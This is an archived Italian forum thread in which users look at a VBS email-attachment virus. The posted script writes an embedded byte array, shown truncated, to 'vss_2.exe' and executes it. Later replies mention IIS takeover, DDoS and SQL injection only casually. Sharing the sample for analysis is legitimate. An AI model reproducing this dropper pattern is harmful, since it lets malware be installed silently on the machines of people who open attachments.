PDA

Visualizza versione completa : Un Virus. VBS



follettomalefico
09-05-2004, 16.09.56
giusto poco fa mi arrivato un virus. Check... un VBS.

Bene, evito -ovviamente- di eseguirlo e decido di buttarci un occhio:



dim filesys, filetxt, getname, path, textfile, i
textfile = "vss_2.exe"
Set filesys = CreateObject("Scripting.FileSystemObject")
Set filetxt = filesys.CreateTextFile(textfile, True)
getname = filesys.GetFileName(path)
dim a
a=Array(77,90,0,0,1,0,0,0,2,0,0,0,255,255,0,0,64,0 ,0,0,0,0,0,0,64,0,0,0,0,0,0,0,180,76,205,33,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,144,0,0, 0,169,38,221,19,237, ...[CUT]... ,79,91)
for i=0 to 21322
filetxt.Write(chr(a(i)))
next
filetxt.Close
dim z
dim zz
Const ForReading = 1, ForWriting = 2, ForAppending = 3
const RemoteExe = "vss_2.exe"
set zz = wscript.createobject("wscript.shell")
z = zz.run ("vss_2.exe")
wscript.quit


Interessante, nevvero? Il virus wrappato come array nel vbs che lo scrive su disco e lo esegue...

21322 bytes di virus :)

TrustNoOne
11-05-2004, 03.11.02
scusa ma con vbs puoi salvare files in remoto? qualcosa non mi quadra O_o

follettomalefico
12-05-2004, 22.05.25
Salvare files in remoto in che senso? Quel VBS un allegato...

TrustNoOne
14-05-2004, 05.26.00
Originally posted by follettomalefico
Salvare files in remoto in che senso? Quel VBS un allegato...

ma che cavolo e' VBS O_o

avevo confuso con vbscript O_o

follettomalefico
17-05-2004, 20.56.26
Infatti, VBS = Visual Basic Script.

Quel file vbs arriva in allegato mail e "scrive" su disco il contenuto dell'array... ovvero il virus :D

TrustNoOne
19-05-2004, 14.31.59
Originally posted by follettomalefico
Infatti, VBS = Visual Basic Script.

Quel file vbs arriva in allegato mail e "scrive" su disco il contenuto dell'array... ovvero il virus :D

scusa ma in quanto vbscript non puo' andare anche su pagine web? umh

Yoghi
20-05-2004, 01.40.02
mi sembra di vedere le shellcode di linux ... solo che li mooolto piu difficile riuscirci! ;)

TrustNoOne
20-05-2004, 21.59.41
Originally posted by Yoghi
mi sembra di vedere le shellcode di linux ... solo che li mooolto piu difficile riuscirci! ;)
eh infatti non esageriamo :D

Mi hanno consigliato un libro carino al riguardo, ora non mi ricordo il titolo, poi lo posto.

follettomalefico
25-05-2004, 13.07.20
Si beh, penso sia fattibile anche da siti web, soltanto che credo abbiano pi restrizioni sull'accesso a disco... :)

Yoghi
25-05-2004, 13.29.43
Originally posted by follettomalefico
Si beh, penso sia fattibile anche da siti web, soltanto che credo abbiano pi restrizioni sull'accesso a disco... :)


sogna ... qui si parla di IIS ... trovata una falla si diviene in fretta god del sistema senza contare che se buco una macchina solo arrivando ai permessi di IIS posso sempre usare quest'ultimo per i miei scopi stile DDOS, sniffing etc etc!

TrustNoOne
25-05-2004, 17.25.02
Originally posted by Yoghi
sogna ... qui si parla di IIS ... trovata una falla si diviene in fretta god del sistema senza contare che se buco una macchina solo arrivando ai permessi di IIS posso sempre usare quest'ultimo per i miei scopi stile DDOS, sniffing etc etc!

tu si' che sei h4xx0r :asd:

follettomalefico
26-05-2004, 00.59.06
Aspetta, ma stiamo parlando di pagine aperte, non pagine hostate ;)

Yoghi
27-05-2004, 15.22.35
sql-injection , cgi , pagine php senza la validazione degli input... mejo cosi?

o lato client? applet, js, etc etc

follettomalefico
30-05-2004, 21.14.12
...ovvero, un virus da mail, con tutta quella roba non c'entra nulla :D

O quasi: appunto un vbs. Ovvero un allegato che di tua volont "apri" e ti ritrovi infettato.

Yoghi
30-05-2004, 21.53.28
si spammamava un po per fare gli sboroni e per seminare un po di conoscenza.... magari chi legge cerca su google per sapere di che si parla.... :dentone:

follettomalefico
31-05-2004, 01.29.50
:roll3:

TrustNoOne
02-06-2004, 06.32.22
Originally posted by Yoghi
si spammamava un po per fare gli sboroni e per seminare un po di conoscenza.... magari chi legge cerca su google per sapere di che si parla.... :dentone:

ma tu fai sempre lo sborone :asd: